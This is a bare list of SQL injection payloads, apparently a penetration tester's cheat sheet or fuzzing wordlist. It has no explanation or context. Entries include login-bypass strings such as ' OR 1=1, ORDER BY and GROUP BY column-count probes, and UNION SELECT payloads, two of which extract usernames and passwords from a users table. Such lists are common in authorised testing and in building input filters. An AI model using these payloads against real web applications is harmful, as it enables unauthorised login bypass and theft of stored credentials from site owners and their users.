' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
 OR 1=1
 ' OR 'x'='x
 ' AND id IS NULL; --
 --- ORDER BY ---
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
--- ONION ---
' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL--  
' UNION SELECT NULL,NULL,NULL--  
' UNION SELECT NULL,NULL,NULL,NULL,'a'-- //
' union select null, id, username, password, fname from users -- //
' UNION SELECT username, password FROM users --
